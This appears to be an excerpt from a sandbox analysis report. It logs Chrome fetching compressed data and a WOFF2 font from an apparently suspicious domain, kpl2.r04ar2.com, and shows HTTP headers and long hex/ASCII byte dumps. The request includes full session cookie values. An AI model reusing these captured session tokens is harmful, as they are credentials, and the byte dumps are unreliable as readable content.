                                                          2024-08-27 22:11:08 UTC1369INData Raw: 6e c2 97 42 2f 35 de 74 d3 5e f4 39 ff 11 7a a1 e7 db 00 aa 6a 1d 19 56 5a 57 86 48 dc 00 97 0c cb df 06 44 32 47 d0 be cf d6 47 e1 40 dc f0 9f e8 bc ef e6 e4 11 eb e1 13 bf 8f ec f1 0c fa c6 ab 90 aa 27 03 73 ec a2 5a 00 90 2e ee 04 71 d6 a8 af e9 82 6f 6a bb 7a 16 de dd 07 09 27 ab 4f 54 b9 aa 55 cd aa 5a fd 45 2d 01 d5 75 ea b0 3a a3 3e a3 38 d5 a4 ce 83 de 7c d0 df 97 52 70 75 94 92 c0 9f d8 51 f9 02 a8 d4 bf 0d 42 5d 85 3a 41 99 ea 04 a8 1d 40 1e 50 59 8d a6 7b cc dc 9e fc 2d 41 9c 5d 4e 7e e1 ae 81 59 7d 09 c9 c5 66 eb 02 ac d5 ea 24 f2 9c 78 a1 06 76 01 ed 20 75 4a f3 4a 73 10 96 d3 c5 99 53 50 7e d2 e5 2c 1e 67 be 18 f1 f2 a0 3a 07 1a 6b d4 11 70 26 01 60 40 f6 04 e9 96 a1 d1 83 3c d3 03 30 a4 9e 21 58 2e b9 e8 f5 4a d5 14 1b 2a b7 a9 57 21 b7 4c
                                                          Data Ascii: nB/5t^9zjVZWHD2GG@'sZ.qojz'OTUZE-u:>8|RpuQB]:A@PY{-A]N~Y}f$xv uJJsSP~,g:kp&`@<0!X.J*W!L
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 06 46 7b 14 75 5a 7d ac de 52 27 f5 1a 9c 39 86 da a5 f6 aa 77 20 cb 62 68 0f 34 06 da 9b 6d cb 57 8e 1f aa b3 6a 87 ab 1a 2d 95 b7 c3 cd ea 20 ec e4 20 e4 58 62 d2 a1 73 2d f1 c6 01 8c ad b5 af 0c 39 56 10 ed a5 c0 9e 8a b3 24 f8 b3 0c f5 67 3c dd 1c d1 67 f8 61 5f 6f 80 8a a5 f0 7d 7e b1 da 06 f4 6d c1 dd 15 e4 87 9e 7f a2 df d2 6b 3f 0a 7c 59 82 eb 55 1a 8e e3 93 ba 16 47 b5 11 ef f0 ef 6d 8b 2b d5 ea 7e 3c b9 4e 7f c7 25 1e 2d e8 5a 17 09 60 fe 86 9a a4 72 25 2f e8 02 2b db 4d 37 e8 55 27 f5 38 65 ab 0f 1d 9a da 48 4c 4b 16 fe e6 a4 da 6f 71 df a0 ae 62 b9 65 ed bf c4 41 e5 d1 d0 46 b6 ae f5 10 75 5c 1d 06 cf fc a6 15 68 2a ac 9c da bd 26 1f f6 56 49 be c2 33 cf f4 db d8 52 bd 9e a6 69 8f 20 71 d3 03 9d 50 07 1c 1f 60 98 39 7c c4 bc 3e 14 3d d2 60 a6
                                                          Data Ascii: F{uZ}R'9w bh4mWj- Xbs-9V$g<ga_o}~mk?|YUGm+~<N%-Z`r%/+M7U'8eHLKoqbeAFu\h*&VI3Ri qP`9|>=`
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 3d 8d ab 6f bb 08 29 71 c1 88 90 33 d7 58 35 64 95 ce b7 a1 21 51 be 30 47 2d b2 0e b5 9e 1d 15 6d 0b c8 96 da fa a0 ca c3 08 65 c8 4a c2 22 b7 ca 90 fe 55 ad b1 5d 3d d7 69 66 d6 59 bb ac 92 9b df 5d b4 59 47 5b a0 d6 a0 36 4b 32 2b 43 f5 17 b3 12 b6 f2 f1 06 e4 bd 46 ab 26 29 ed db 72 c8 f9 8e 27 7c d5 c0 f4 66 7f a5 04 5d b9 a5 ae 07 5d 54 ee 76 a8 3c aa ab 4e c9 d2 8a a4 2a d8 25 df fe 6b 5b 14 2a 5b 9a db fb 4b 97 75 75 4a 65 c4 dc dd 6b 7f c9 2f b5 48 99 53 57 d5 44 fb 7b 1c d4 1d 75 f0 0b a9 e2 ef b2 91 c5 37 80 af c9 ad ef 99 d5 fd 12 21 b2 25 f3 31 35 2c 45 de c5 d4 c9 93 a6 8e a5 09 bf 33 44 e7 bc f2 05 6a 36 20 00 d0 35 76 26 ee 24 8a a7 e9 2f f4 18 f0 41 b5 c0 14 14 2d 0d e8 15 76 e9 d5 5a d5 d6 45 58 cb 6c b1 fc 66 8b 95 ed 35 c3 fb b5 56 22
                                                          Data Ascii: =o)q3X5d!Q0G-meJ"U]=ifY]YG[6K2+CF&)r'|f]]Tv<N*%k[*[KuuJek/HSWD{u7!%15,E3Dj6 5v&$/A-vZEXlf5V"
                                                          2024-08-27 22:11:08 UTC1369INData Raw: f1 60 1e 49 c9 7c 3b 8f a6 4b f8 4e be 87 02 3c 86 c7 51 26 a2 09 ec 14 f1 e4 e7 d4 83 a7 f0 14 1a c8 53 79 2a f5 e6 a7 f8 29 4a e2 5f f0 2f 70 fe 34 3f 8d f3 5f f2 7f a2 cf 34 9e 46 5d f9 57 fc 2b 4a e3 67 f8 19 9c ff 9a 7f 8d f3 e9 3c 9d ae e1 19 3c 83 46 f1 4c 9e 49 f7 f0 2c 9e 45 63 78 36 cf a6 2b 79 0e cf a1 7e 88 59 cf 92 0f 51 eb 79 1c e7 f2 5c 1a cd f3 78 1e 0d e0 f9 3c 9f 46 f0 0b fc 5f d4 8d 17 f0 02 1a cc 0b 79 21 dd c0 8b 78 11 dd c6 8b 79 31 8d 44 a4 5b 42 b7 f0 52 5e 4a b7 f2 4b fc 12 8d 47 c4 5b 46 fd 79 39 2f a7 6b 79 05 af a0 eb 78 25 af a4 eb 11 07 57 d1 55 bc 9a 57 eb ff 3b c4 b9 74 35 ff 96 5f a6 cb 10 19 5f a1 3b 78 0d af a1 9b 74 84 a4 e1 3a 42 d2 5d 88 90 9b e8 76 44 c9 cd 74 b3 8e 93 94 a1 63 23 28 dc c1 3b 70 dc c9 3b 69 18 a2 64
                                                          Data Ascii: `I|;KN<Q&Sy*)J_/p4?_4F]W+Jg<<FLI,Ecx6+y~YQy\x<F_y!xy1D[BR^JKG[Fy9/kyx%WUW;t5__;xt:B]vDtc#(;p;id
                                                          2024-08-27 22:11:08 UTC1369INData Raw: a8 e9 52 99 2e 4d 84 e2 4d a6 2f 86 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01 7f be 7f 07 f8 73 fc ab fc cb fc 63 fd f1 fe f8 a3 95 4a 9e aa 38 27 ec 40 58 be 75 35 c5 8a 4c 9b 39 e5 af cd 65 0b 47 f9 98 13 7c ad 34 70 06 da 4c 76 52 9c f9 65 db 65 ab 93 e6 2c 71 32 9d 2c 67 8d 93 e3 6c 74 f2 9c 5d ce 1e 27 df 29 70 0e db de 61 e7 b8 f3 31 e7 1d 4e de 3f ea 6c 27 e7 cf 22 c4 ba f4 ae 36 6a b1 f6 e8 4d ad 52 8a 66 6b 9e 36 e9 39 4d d2 34 8d 53 82 86 6a 87 b6 6a a7 66 6a be 5e d5 58 bd a6 17 35 45 dd f5 ba c6 eb 0d 4d d4 0c 2d 51 86 d2 94 ae 09 ca d4 7d 5a a0 85 4a d4 7e a5 aa 9f b2 b4 59 3d d8 a7 95 4a 52 9c 16 69 8c 66 11 4d 1b da
                                                          Data Ascii: R.MM/X:Q+T"#Pc~2c?uIscJ8'@Xu5L9eG|4pLvRee,q2,glt]')pa1N?l'"6jMRfk69M4Sjjfj^X5EM-Q}ZJ~Y=JRifM
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 54 be 1d b1 2c 41 1c 79 97 ab 31 c7 11 da 60 1f 5c 11 1e e6 af 33 1a c2 62 c2 63 42 82 74 a1 fe a1 29 51 1a e8 94 ce 90 11 c1 e8 fd 55 ea 80 00 bd bf 37 63 34 e0 8c 2c 4b 66 9c d1 a8 95 de 18 b4 e7 f1 5f 17 9e 58 61 2b 29 ef 5e 51 bc fe dc 90 fd 36 83 e6 2f 1c 5a 74 1b c7 77 0f ae e9 11 3e e5 77 66 b6 ed ae 69 bf 2f 33 fd cc 8a 96 23 83 05 6c 79 fd bc 92 4e e1 a4 fd d1 ae ae a6 7e 61 39 a5 77 d3 e8 6d 7e 35 7f 04 19 50 ba 2d 25 32 c2 db 0b 46 11 97 21 86 c1 cd 80 5e 40 39 c1 b9 99 03 fa 04 a2 0a 8c c2 42 fc 7c 3d dc 90 01 1b 78 b5 7f 12 1f 1d 17 c7 58 32 fd b2 62 cc 19 5c a0 3a 2e ce 18 ed 0d 38 47 30 e6 8c 2c 6b a0 8a 63 b9 87 47 ce 75 b5 9f c5 e8 e8 9f 71 7a dd 97 c9 2f 3f da fe f8 e2 bc fc c1 63 6d f7 5f ce f9 a2 56 b8 ee df f1 32 f6 7e fe 04 f6 7d ad
                                                          Data Ascii: T,Ay1`\3bcBt)QU7c4,Kf_Xa+)^Q6/Ztw>wfi/3#lyN~a9wm~5P-%2F!^@9B|=xX2b\:.8G0,kcGuqz/?cm_V2~}
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 50 87 c9 64 24 c2 03 28 ac 50 96 bb ef f8 1e 3c 28 7c 24 bc f6 92 80 47 fa cf 6c 9c 21 68 97 ad 5d b7 f4 2f ec 5f 77 ff 34 c9 7e 80 a9 b7 bf c0 ef cc ed 7b 44 f8 b2 bd ae ae 4d 78 98 cc b3 e4 d1 db 5c 3a d0 38 89 e8 df b0 50 15 cf 61 16 24 07 cb 32 cd 40 e4 00 51 7c 28 fa 37 2a 22 38 d0 d3 1d 25 e1 24 5e 11 20 11 ac 99 62 10 13 67 c9 2c 04 e9 1a 20 0a 5b 15 a1 23 19 7d 66 da c0 4b 7b 9a 7c 47 dc 32 2b ba b2 57 ae 78 7f 14 bd 3f 75 e5 33 ed 4f 7e 91 fd 45 74 5f 75 75 ef fb c2 fb b3 b6 bc e4 9f 37 70 64 81 6d 5a 47 51 64 73 49 7f cf c0 b9 4b 73 0f f4 e4 1c 7f b8 70 76 55 fd f4 fe ee be 33 17 9a 1e 1e 28 00 7c fd 81 76 bb a9 1d 15 6a 0b 22 04 a2 3a d8 9b e8 04 51 be d2 09 88 41 be 13 6d 85 df 15 66 70 2b 84 19 02 f7 e4 67 9f dd 6d 83 fa 0f 41 7f df 85 fa c1
                                                          Data Ascii: Pd$(P<(|$Gl!h]/_w4~{DMx\:8Pa$2@Q|(7*"8%$^ bg, [#}fK{|G2+Wx?u3O~Et_uu7pdmZGQdsIKspvU3(|vj":QAmfp+gmA
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 91 4d 4a 08 0f 03 db c2 c7 5d 85 d2 70 9a c3 c8 aa a2 8d 93 28 3e 95 5a 45 fe 3b 50 6b d7 92 2d d1 31 ee 01 1e f7 fd 6c 1b 51 87 4b ea eb 87 6c 21 42 79 43 c0 d4 a8 cc 34 85 6a 30 de 96 9e 0c 5c fd 20 68 c8 d6 71 1a f2 85 27 6e 36 04 64 45 65 36 a5 c8 54 24 fc da 02 f3 0d a4 20 f2 45 91 28 cb 66 06 9e 52 63 06 ac 77 62 1a 49 f2 56 e3 10 c0 f0 d3 12 cb 30 24 48 1b e9 17 a9 05 db d3 8d 58 e0 8e 3e b8 d6 68 31 63 c5 0f 27 83 fe d3 f1 be f8 92 25 63 de 38 ee 13 1e 72 f4 c8 99 c5 97 ec 3f 12 bd 72 61 f7 25 61 c3 ff 0f f0 03 ed c7 df 47 7d c1 40 82 9f 1b f0 21 08 78 ce 1d bc 51 90 65 2a de 5d 25 79 a5 6a 4c f5 55 60 80 de 5f e7 27 69 2b ad af a7 3a 1c 3c 18 bd c1 62 d6 9b f5 46 d1 45 25 28 ea 40 6b 5e 22 ae ea e0 20 71 56 e1 2f d3 6f 7f 90 df f9 e9 a7 9f 1e bd
                                                          Data Ascii: MJ]p(>ZE;Pk-1lQKl!ByC4j0\ hq'n6dEe6T$ E(fRcwbIV0$HX>h1c'%c8r?ra%aG}@!xQe*]%yjLU`_'i+:<bFE%(@k^" qV/o


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          43192.168.2.449809188.114.96.34431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:11:07 UTC1445OUTGET /90BLxVXhpRTD45c1Cvst53 HTTP/1.1
                                                          Host: kpl2.r04ar2.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Origin: https://kpl2.r04ar2.com
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: font
                                                          Referer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQW
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImN5ZU9uWjB5Qmc5emRSZFlYRWpOUkE9PSIsInZhbHVlIjoiZk1ybHNzQS94ZkV4SXZQVXVldmNNU1BUNlFHMmc4Q0Z1TU9uM08wNC83T28rNVJZRGJkNUtXNmhhRHJuUWRlcTlsR0Q3ZWpxZDk4YjlSRzlVSk51dHVqem5McU9yM3R1WVRtdlR6eFZKT3lGKzdSYy9LNXBRcWtYVHpJK3F5eWgiLCJtYWMiOiIwNGZkZTkxOGViNzk0OGU1NjQ0NjBiNzM2NmRkYmE3Nzk3Yzc4YzdlMDQxMTEzOGQzMWYwMzQzM2FhYTY3ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFmdmdnSE5ONjZBY0JyYjVSVlJ5bmc9PSIsInZhbHVlIjoiS3dpdDVZZEVzOHloalY5dWFqZGxvSEkrMnhRMW85dG1VUExKYjJZQURCdURlR1FRa0Yrdk5iMVJNSmx0SjdCaXFxWDJVMjF0dTdneWgySFBCSm1nWjliUXU1SG53UWp1WHdHQ3YrMVlUSjZId0tGWllVa2NsMTY0NzBhM3lHT1kiLCJtYWMiOiI0YjIxOWZhMTBkZTFhMmNlNWJlMGVhNTRjNGY1MmE2MGI4ZDJjMGI5YTM5ZGQ5ZDBkOGYxMGJkNGM3Mjc2NWY4IiwidGFnIjoiIn0%3D
                                                          2024-08-27 22:11:08 UTC617INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:11:08 GMT
                                                          Content-Type: font/woff2
                                                          Content-Length: 28584
                                                          Connection: close
                                                          Content-Disposition: inline; filename="90BLxVXhpRTD45c1Cvst53"
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p9V%2Bq1ez15zSo77sUr1rZKJHdCVrOqwQxp0k3MBksswxSMP2sZJ6IAFFvLK0iR9XSSVABRnrHvIoIC8Xgy0vg7cJWuhRuj6Y%2Buk%2B1h90w4PIyH9FcdPSqFk0NhDoRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          alt-svc: h3=":443"; ma=86400
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f65458fb70f6f-EWR
                                                          2024-08-27 22:11:08 UTC752INData Raw: 77 4f 46 32 00 01 00 00 00 00 6f a8 00 10 00 00 00 01 36 78 00 00 6f 47 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 bc 3e 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 c0 68 82 a2 42 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 27 07 97 7b 0c 81 0d 5b 78 22 71 04 dd b6 5d c4 a2 0a ca 1b ec 97 68 4a b7 df b3 0a d8 b1 27 dc 0e e2 ce 96 b5 c5 0a 36 ae 32 bb 5b 95 0a ec 05 71 f6 ff ff 7f 7a d2 88 b1 6d 43 77 77 ff 00 08 2a a9 65 55 b0 0a 53 9a a2 10 14 ad 17 8a 9a 11 30 8d c1 53 1a 73 a6 e1 b6 2c ad b0 c2 e4 5c e5 65 96 de 46 b1 26 ef 94 d7 16 8d 6f 55 2a 52 1a 7d 51 f7 43 8e e7 32 b9 54 44 c8 b6 e1 0a d3 35 11 09 23 e7 fa 68 14 48 a4 32 ac 7c 3c e8 31 a3 7a a7 a2 5d cf 78 5a f4 95 0f 7a 9d f0 7a b2 e4 97 57 f8 13 be d9
                                                          Data Ascii: wOF2o6xoGB>`<<bhB6$x> '{[x"q]hJ'62[qzmCww*eUS0Ss,\eF&oU*R}QC2TD5#hH2|<1z]xZzzW
                                                          2024-08-27 22:11:08 UTC1369INData Raw: db e4 35 29 e5 97 60 00 e0 77 26 a7 ec 8c 51 bd 04 a5 aa 2d c9 13 20 11 06 0d 39 e4 58 74 9e 2f 53 51 3f 14 73 2b 75 0c 39 ee 1f 5c b1 68 d4 6c b0 47 cb 23 fc 2a a7 d5 23 40 83 46 d2 88 c9 66 c5 31 84 66 01 9d 3d 60 1f f0 e3 f1 70 ca 0b 01 a0 c2 94 3d 63 f0 be d9 92 66 3d 9c eb 70 20 34 42 79 0e 75 ff 7a 27 cb 0f ee 24 3b 04 73 b6 a4 dd 16 db 7a d0 f6 e3 e3 12 58 be c5 6e 36 79 2d e0 06 b4 05 18 a1 7f b4 fd cf 8a 12 3c cd 09 17 b1 bb 1d be 58 9e 81 7f 85 04 cd 7e 2b 6a 8a 7a bb 6a b2 f8 ff ee f7 db c0 37 f0 50 44 93 b8 4f 10 d5 77 d1 fa 39 9d 90 38 5d 13 21 7e 43 26 98 18 b4 cd d0 fb 13 2a 4c 43 45 d3 dc 4e 66 7e af 4e 9f 65 4a fa 69 58 6e 58 2a 43 81 26 e6 f5 bf 8b 74 b6 55 83 fc 4e 72 d2 40 91 b6 6c 5a b0 80 a7 03 20 d9 8f 58 b9 a2 c8 93 7a cd 73 01 6e
                                                          Data Ascii: 5)`w&Q- 9Xt/SQ?s+u9\hlG#*#@Ff1f=`p=cf=p 4Byuz'$;szXn6y-<X~+jzj7PDOw98]!~C&*LCENf~NeJiXnX*C&tUNr@lZ Xzsn
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 95 0e 88 ec 30 d0 66 50 36 51 17 59 8c ca 45 0b 23 fa 81 55 bc 59 5f 55 fe a0 40 a1 20 35 57 9b d4 3c b9 b3 29 ed a7 16 d3 13 45 0b c5 4c 25 f1 30 23 97 d9 4e bd 28 ab 1d d0 c2 14 6f c9 61 f9 56 40 1e 2b aa 69 29 e1 5a 15 f9 c1 0e 10 e8 40 d0 3a 0c 29 8c a9 39 12 e8 b0 01 e8 f6 ee 52 ab d2 f0 06 94 a4 e3 89 30 00 08 57 44 ed a2 83 bc a0 e0 07 54 5b 4d 54 db a3 29 51 e2 43 bf 56 c9 5a 96 e8 1f 92 c0 20 b0 78 90 51 a2 3c 19 06 e5 c4 18 b4 51 95 16 6c ec cd a6 0b e6 b6 d1 db 00 56 0c 1e a0 cb a0 80 03 02 ba eb e2 92 60 fa 62 ea 87 59 4d 58 29 3a 30 36 0c 02 ce fb 12 0a 67 57 cf 6d 7c f0 81 96 93 88 02 ba ef 92 55 dd 8c f9 fa 69 f2 71 0c 59 37 73 08 39 5d ce e5 85 bb 59 16 bd 18 b4 30 75 01 f3 09 a6 26 0f af 55 73 55 f9 8b 2d cb f9 49 0a 03 cd 24 bd 7e 42 53
                                                          Data Ascii: 0fP6QYE#UY_U@ 5W<)EL%0#N(oaV@+i)Z@:)9R0WDT[MT)QCVZ xQ<QlV`bYMX):06gWm|UiqY7s9]Y0u&UsU-I$~BS
                                                          2024-08-27 22:11:08 UTC1369INData Raw: bb fa 9b 75 db a1 66 75 c9 75 d3 64 f1 8c aa ea bf de f8 8f 20 f3 86 3a ba e8 43 54 6a 8a 28 69 af 3c e6 ea b6 b2 5d 1b f8 18 09 92 64 e8 bd 0a 1d e0 d3 ba bc 10 cc cb 06 57 5c 77 bd a9 1a 44 81 23 b1 00 73 e8 10 9d bc f0 cc 39 be 92 1c 86 29 96 14 29 84 bf f5 e6 98 7e 7c d5 7f bf fc c3 77 d3 3c 9d cf ff 57 80 cf 97 9a d9 60 5e bd 00 ef d9 ff 57 bb 7c 10 17 61 91 5f e2 e0 bf 67 17 38 6d 72 f7 c0 87 b9 c7 2b b1 0e 4b b1 bd 52 1c c4 78 e7 87 af ff f6 09 93 1e 60 d4 16 c7 bd 7b 90 2e ac c4 27 6b 93 0d 57 9e 7c 28 0f 5c f9 c6 1c d3 b8 97 5b 0f 28 3e 06 4b ae 4a 42 c2 63 6d 65 b3 87 f4 02 73 e9 ec 31 94 dd 4d 35 43 9e 82 ef 1a 19 ca 1a de 11 5a 06 1e 1c 66 50 e3 92 33 b2 78 9f 06 fa de d0 77 b9 e5 f7 d4 e5 a7 d9 89 be 67 54 d4 43 9f 16 46 78 01 9d 5a 25 56 9b
                                                          Data Ascii: ufuud :CTj(i<]dW\wD#s9))~|w<W`^W|a_g8mr+KRx`{.'kW|(\[(>KJBcmes1M5CZfP3xwgTCFxZ%V
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 2a c2 93 2c 7c e1 4f 0a f5 78 68 ed f3 95 63 92 85 c2 64 da 80 92 57 22 90 60 5c e2 76 78 80 a3 e7 17 e6 65 84 d8 68 fc 45 39 36 9d b6 bd 10 a7 d5 3c 40 98 a4 95 3d 2f 5c b2 3e 4f 05 c0 c6 03 43 4f 91 c1 b6 2a 1c ab 73 0f 48 30 21 8e 1a d3 24 e5 69 1b 45 37 55 e3 c4 1b 70 81 70 c6 8e c3 c7 15 fd d0 6a 42 d4 1a 9b 2c 71 78 1c 68 90 8e 66 52 12 59 39 ec 05 60 4b 10 46 0a d3 3b 4f 93 e9 9c 42 34 fe 5a 4c 23 c9 da 61 da ca b0 2e 42 bf ba 4e 43 ee 7b a5 b6 cd 10 a9 9e d6 76 c2 da 8c 75 0b 16 88 a2 6a f6 21 ff 46 59 15 b1 d8 a4 ae 93 c7 8f 9e 79 f0 b8 5e 0d 87 be b3 43 8a 3b 87 21 5b ce a4 5d 92 b7 f9 a1 38 f5 96 d0 8b c3 0e d8 3d be 24 30 f0 11 92 c4 5c c9 d4 f5 38 62 51 c4 09 ab 9c ee 74 c2 1d 9d 3f 80 6f 2b ee d5 47 d6 5b 60 91 6e 70 0d bf 4e 8d bc 0a 1b c8
                                                          Data Ascii: *,|OxhcdW"`\vxehE96<@=/\>OCO*sH0!$iE7UppjB,qxhfRY9`KF;OB4ZL#a.BNC{vuj!FYy^C;![]8=$0\8bQt?o+G[`npN
                                                          2024-08-27 22:11:08 UTC1369INData Raw: ef c7 df 5e 30 2e a5 1f cd 43 40 1e 70 cc f3 0a 36 82 72 f9 89 38 79 b0 a5 24 70 54 fe 74 60 c5 01 22 5e b9 e6 19 a1 43 02 57 17 2b 13 89 c3 3d af 86 3d 5b 59 ec d0 9d 86 23 f9 67 f1 fb 3a 58 07 48 c6 63 87 75 a2 a8 0c 94 5b bc 1e 8e 82 53 19 0c 24 da 49 3c 17 4c 27 29 d9 9d 80 57 5a ab 4f 76 b1 d5 d5 66 d6 cd 0b 43 de c4 07 9d fb 6a 3d 35 5d 05 18 4d fc cf f3 d5 52 8a 37 07 16 7b c0 bd 19 bc 8f 5b ba 06 00 c5 83 23 de f6 d2 01 41 b8 02 01 50 23 69 24 5c 1c ef 34 bf 27 04 01 13 5c 88 a0 4a 93 f8 12 79 bb a9 68 e7 2f 4d 81 05 1e 94 a0 46 8b ee 74 70 0e c0 c0 06 bf 4a a1 4d 9b de 6d 3c 06 38 10 40 08 15 1a b4 ec f1 81 bb 5f 18 f6 cc 77 10 ea 8d 43 df 85 0f fd 36 f8 e2 04 f8 bf 37 77 9c 81 9f e8 12 4f 3f 5c fa 4a 33 6a 34 14 cd b7 3d 06 0f be ed b1 78 f5 6d
                                                          Data Ascii: ^0.C@p6r8y$pTt`"^CW+==[Y#g:XHcu[S$I<L')WZOvfCj=5]MR7{[#AP#i$\4'\Jyh/MFtpJMm<8@_wC67wO?\J3j4=xm
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 7b 8a be a9 a2 c5 b8 43 ea 57 b3 bc 10 37 82 25 84 7d 6c eb e6 e6 16 e5 cc a2 be 5d 7f 9c 81 78 43 89 26 d3 24 7b 66 a6 e7 a6 78 6a 9a 55 d3 3d 36 c3 13 cb bc b7 a6 03 56 fb 2f cd 7d 12 13 c0 38 5c 55 a0 e1 24 e3 29 0d 8d ab 57 ae 5a f3 da 99 73 6a ff 83 13 79 f9 de ad a4 cd b6 da 6b 75 de 3c 4e 5d ab ad 29 8e bd e8 f4 90 28 0f 5f 6c f3 f3 71 f4 b1 c7 9f 78 f2 a9 a7 9f e1 41 ca f5 83 8e 3b ef 36 73 5a b5 d9 a6 5d 87 4e 5d ba f5 da 6e 87 9d 76 d9 6d 8f bd fa ed 33 f0 8a 1f 7c f0 73 cd 61 47 f8 86 14 f4 d9 05 4a 43 a1 a2 d7 e1 81 fb 1e 7a e2 b1 e7 3e fb e6 2b 1b 30 fb 13 00 f8 c0 06 e0 02 9b 00 1e f7 07 3f 94 ea cb 9c fd 8a 07 b7 5f 72 79 43 e1 99 99 f9 af 64 20 e2 d5 4f f8 1a 9f 0f 45 87 ab 6f b8 e5 b6 3b 6e 6a 3e 07 38 ea e2 92 3d 6f 53 e8 7a d5 90 a4 f5
                                                          Data Ascii: {CW7%}l]xC&${fxjU=6V/}8\U$)WZsjyku<N])(_lqxA;6sZ]N]nvm3|saGJCz>+0?_ryCd OEo;nj>8=oSz
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 67 f7 51 bd 61 37 69 bc 69 4b 76 78 bf 58 39 1e 64 1d 8e 2d 52 6f f1 43 6b ea a6 58 f8 13 68 45 70 b2 db 5a 4d d1 66 ac 0c bc b8 74 db ad f6 4c df 84 10 7c 9b 9c ea 48 0d 9c 0e 4c d5 de a5 81 a8 4e 91 7e be 3d c8 de d1 df a1 59 98 3a 2d 47 0e ae f9 33 c0 16 17 db ed 6f c8 04 34 b3 31 0a 82 b1 49 41 13 32 21 98 26 40 6b 46 10 cc 4d d0 02 82 65 02 75 ad 08 82 b5 09 da 40 b0 4d 80 d2 8e 20 d8 9b a0 03 04 c7 04 5a 3a 11 04 67 13 74 81 e0 9a 40 43 37 82 e0 6e 82 1e 90 ef 09 85 af e3 7e 79 b3 a8 3c 1f af a3 ea b7 59 3a 65 d4 f0 e9 2e 26 f6 67 88 bf 3c 17 fe 4a 7d 86 6f b3 d4 df 1f 89 7f d8 c2 3f 29 f0 6b 96 fb f7 23 f1 1f 5b f8 2f 05 29 b5 c1 3b 3f f9 d3 9d 6f 74 4d 92 6e c1 9b 60 e7 5b 3f ce 93 de be b6 0e 52 ab 33 bf 5e c8 c7 d5 43 95 3d 57 f1 64 9a 6e d7 e8
                                                          Data Ascii: gQa7iiKvxX9d-RoCkXhEpZMftL|HLN~=Y:-G3o41IA2!&@kFMeu@M Z:gt@C7n~y<Y:e.&g<J}o?)k#[/);?otMn`[?R3^C=Wdn
                                                          2024-08-27 22:11:08 UTC1369INData Raw: 9a 4e 20 d9 ad ef 8f d4 83 74 ce bb a7 2e 77 88 ac c3 8d 0f b2 51 bb 08 c0 b8 d9 ad 54 c6 3f f5 45 b6 35 f7 cb 1c cb 38 c1 a2 9a 9b bb 68 e1 2e a8 d4 0d b2 c4 ad c9 e2 ab a1 8d df 65 cf 1b 09 af e5 6d 50 2f b2 bc d5 91 41 8b 0c 3c 2c db 32 2a a4 e0 28 ad 42 06 2b ca c1 98 40 6d ea 72 b4 be d5 41 a6 7d 2b 6b 37 24 85 3a 61 fd 7c 04 75 c4 5f a6 e5 5d 66 a6 df a4 f5 e8 28 89 3d ab 0b 0c 6c b4 d2 a8 77 7e 3e 40 5f 74 8d 57 30 00 c5 e8 bd 8c fd d4 dc ad 43 5d 93 64 52 3e 47 47 5e f4 3b 0c 17 af f2 bd 11 03 7d e5 8b 1d 0d ae ad 1d c8 4c ce ae 60 97 20 5d 60 73 e9 4d 28 9e fa 17 4a 14 06 9a f3 51 58 d3 87 f7 f0 6a a7 e7 02 f1 7c a6 6b c0 5a 9c a6 71 a7 6d 77 5c a5 e4 ea 23 ea 5a 6c 9c d5 7a 09 7f 9a b1 87 11 03 90 28 34 e5 6a cc db 32 a1 cc 92 41 35 e7 6c 42 45
                                                          Data Ascii: N t.wQT?E58h.emP/A<,2*(B+@mrA}+k7$:a|u_]f(=lw~>@_tW0C]dR>GG^;}L` ]`sM(JQXj|kZqmw\#Zlz(4j2A5lBE
